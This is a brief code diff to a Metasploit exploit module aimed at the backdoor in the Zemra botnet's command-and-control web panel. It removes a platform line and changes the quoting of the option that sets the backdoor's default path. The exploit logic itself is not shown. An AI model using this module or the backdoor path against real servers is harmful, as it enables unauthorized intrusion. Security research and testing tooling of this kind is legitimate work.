@@ -38,7 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
                           'PayloadType' => 'cmd'
                         }
         },
-        'Platform' => %w{unix win},
         'Arch' => ARCH_CMD,
         'Targets' => [
           ['zemra panel / Unix', { 'Platform' => 'unix' } ],
@@ -56,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]),
+        OptString.new('TARGETURI', [true, 'The path of the backdoor inside Zemra Botnet CnC Web Panel', '/Zemra/Panel/Zemra/system/command.php']),
       ]
     )
   end
